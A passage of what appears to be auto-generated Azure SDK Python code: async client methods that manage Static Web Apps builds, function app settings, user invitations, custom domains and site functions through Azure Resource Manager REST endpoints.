'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_build.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}'} # type: ignore
async def create_or_update_static_site_build_function_app_settings(
self,
resource_group_name: str,
name: str,
pr_id: str,
app_settings: "_models.StringDictionary",
**kwargs
) -> "_models.StringDictionary":
"""Creates or updates the function app settings of a static site build.
Description for Creates or updates the function app settings of a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:param app_settings:
:type app_settings: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_build_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_settings, 'StringDictionary')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site_build_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/config/functionappsettings'} # type: ignore
def list_static_site_build_functions(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteFunctionOverviewCollection"]:
"""Gets the functions of a particular static site build.
Description for Gets the functions of a particular static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteFunctionOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteFunctionOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteFunctionOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_build_functions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteFunctionOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_build_functions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/functions'} # type: ignore
async def list_static_site_build_function_app_settings(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> "_models.StringDictionary":
"""Gets the application settings of a static site.
Description for Gets the application settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_build_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_build_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/listFunctionAppSettings'} # type: ignore
async def create_or_update_static_site_function_app_settings(
self,
resource_group_name: str,
name: str,
app_settings: "_models.StringDictionary",
**kwargs
) -> "_models.StringDictionary":
"""Creates or updates the function app settings of a static site.
Description for Creates or updates the function app settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param app_settings:
:type app_settings: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_settings, 'StringDictionary')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/config/functionappsettings'} # type: ignore
async def create_user_roles_invitation_link(
self,
resource_group_name: str,
name: str,
static_site_user_roles_invitation_envelope: "_models.StaticSiteUserInvitationRequestResource",
**kwargs
) -> "_models.StaticSiteUserInvitationResponseResource":
"""Creates an invitation link for a user with the role.
Description for Creates an invitation link for a user with the role.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param static_site_user_roles_invitation_envelope:
:type static_site_user_roles_invitation_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserInvitationRequestResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteUserInvitationResponseResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserInvitationResponseResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserInvitationResponseResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_user_roles_invitation_link.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_user_roles_invitation_envelope, 'StaticSiteUserInvitationRequestResource')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteUserInvitationResponseResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_user_roles_invitation_link.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/createUserInvitation'} # type: ignore
def list_static_site_custom_domains(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteCustomDomainOverviewCollection"]:
"""Gets all static site custom domains for a particular static site.
Description for Gets all static site custom domains for a particular static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site resource to search in.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteCustomDomainOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCustomDomainOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCustomDomainOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_custom_domains.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteCustomDomainOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_custom_domains.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains'} # type: ignore
async def create_or_update_static_site_custom_domain(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> "_models.StaticSiteCustomDomainOverviewARMResource":
"""Creates a new static site custom domain in an existing resource group and static site.
Description for Creates a new static site custom domain in an existing resource group and
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to create.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteCustomDomainOverviewARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteCustomDomainOverviewARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCustomDomainOverviewARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_custom_domain.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteCustomDomainOverviewARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteCustomDomainOverviewARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site_custom_domain.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}'} # type: ignore
async def delete_static_site_custom_domain(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> None:
"""Deletes a custom domain.
Description for Deletes a custom domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to delete.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_custom_domain.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_custom_domain.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}'} # type: ignore
async def validate_custom_domain_can_be_added_to_static_site(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> None:
"""Validates a particular custom domain can be added to a static site.
Description for Validates a particular custom domain can be added to a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to validate.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.validate_custom_domain_can_be_added_to_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
validate_custom_domain_can_be_added_to_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}/validate'} # type: ignore
async def detach_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> None:
"""Detaches a static site.
Description for Detaches a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to detach.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.detach_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
detach_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/detach'} # type: ignore
def list_static_site_functions(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteFunctionOverviewCollection"]:
"""Gets the functions of a static site.
Description for Gets the functions of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteFunctionOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteFunctionOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteFunctionOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_functions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteFunctionOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_functions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/functions'} # type: ignore
async def list_static_site_function_app_settings(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StringDictionary":
"""Gets the application settings of a static site.
Description for Gets the application settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/listFunctionAppSettings'} # type: ignore
async def list_static_site_secrets(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StringDictionary":
"""Lists the secrets for an existing static site.
Description for Lists the secrets for an existing static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
